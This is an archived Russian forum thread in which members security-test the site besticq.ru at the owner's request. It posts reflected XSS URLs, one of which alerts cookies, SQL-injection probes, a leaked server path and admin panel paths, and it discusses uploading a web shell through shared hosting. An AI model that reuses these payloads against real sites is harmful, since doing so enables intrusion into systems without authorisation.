PDA

Просмотр полной версии : Проверьте besticq плз

Ridikh
03.12.2007, 20:28
Собсно сабж ;)
biophreak
04.12.2007, 13:08
Проверяй строку браузера на корректность в гостевухе...
И проверочный код - нафиг он вообще там...юзай капчу ))))
groundhog
04.12.2007, 13:19
http://besticq.ru/gb/index.php?act=sendmail&to=%22%3E%3Cfont%20style=color:red;font-size:200pt;%20%3E%CA%F0%E5%E2%E5%E4!%3C/font%3E&for=sadsad
Elvis000
04.12.2007, 16:27
раскрытие пути + sql-inj

http://besticq.ru/forum_wap/index.php?id_forum=2&id_razd=12&id_them=521312752&page='
Underwit
04.12.2007, 16:43
Я вам там чуть гостевуху запарол. Кароч если поменять user-agent браузера на код <script>alert()</script> то можно добиться xss, но проблема в том что выводиться не всё, часть символов режиться. Вот. Кароч в гостевухе больше ничо не видно. Извините.
halkfild
04.12.2007, 17:09
[раскрытие]
http://besticq.ru/forum_wap/new.php?page=end'

з.ы. мдя с гостевой конечно не сильно хорошо =\
з.з.ы. смотрю дальше
Underwit
05.12.2007, 16:29
шел например реально залить?
или через другой сайт на хостинге залесть?

через другой сайт реально залесть. По reverse-ip 143 штуки показал.
Underwit
06.12.2007, 02:26
как защитить можно?

halkfild: никак... смотри за своей безопасностю
з.ы. купи выделенный сервер и размести там свой сайт

Почему никак?
Можно если будут правильно выставлены права.
Или купить у хостера отдельный ip.
RenGen
09.12.2007, 19:59
http://besticq.ru/sms/buy.php?uin=9971898&s_language=':)
RenGen
09.12.2007, 20:03
http://besticq.ru/sms/buy.php?uin=9971898&s_country=%22%3E%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
gormet
14.12.2007, 18:14
Warning: implode() [function.implode]: Bad arguments. in /home/d000000155/domains/besticq.ru/public_html/sms/buy.php on line 9
503 Service Temporarily Unavailable in /home/d000000155/domains/besticq.ru/public_html/sms/buy.php on line 9
Смени хостера :) и где продажа 6 знаков? 404 говорит
[aywo]
14.12.2007, 18:29
еще 1 xss)
http://besticq.ru/sms/buy.php?uin=4393348&s_pair=%5C%5C%5C%22%3E%3C%2Ftitle%3E%3Cscript%3Eal ert%28alert%29%3B%3C%2Fscript%3E
Sn@k3
15.12.2007, 16:25
шел например реально залить?



ну так для начала фильтруй кавычку, если есть в параметре пускай переходит на главную =\
имея скуль залить шелл можно при определенных условиях
Sn@k3
15.12.2007, 16:27
что тут такого?


Error_Reporting(E_ALL & ~E_NOTICE); //добавь в скрипт
S(r1pt
19.01.2008, 10:58
Ridikh просто когда даешь сайт на тест, надо убирать всевозможно важную тебе инфу =)
А вообще тебе баги выше описали (и сейчас ищут ещё)
lsass.exe
20.01.2008, 14:13
гостевую снесли, теперь попробуйте сломать
то что вы убрали гостевую никак не повлияло на все остальное ;)
helat
09.02.2008, 00:01
admin000/language.php ваша админка)))
mod001/user.php ваша модерка))))

всё тута http://forum.besticq.ru
Ali_MiX
09.02.2008, 00:05
admin000/language.php ваша админка)))
mod001/user.php ваша модерка))))

всё тута http://forum.besticq.ru
хочешь сказать что там форум дырявый ?